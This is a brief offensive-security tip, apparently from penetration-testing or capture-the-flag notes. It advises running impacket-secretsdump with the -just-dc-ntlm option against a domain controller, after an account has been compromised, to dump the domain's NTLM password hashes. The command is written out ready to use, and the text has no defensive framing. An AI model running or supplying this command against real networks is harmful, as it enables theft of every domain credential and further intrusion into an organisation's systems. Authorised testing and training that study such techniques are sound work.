Try this against the DC after you've compromised an account, especially if you cannot SMB or WinRM into the DC:

```
impacket-secretsdump -just-dc-ntlm domain.local/user@$IP
```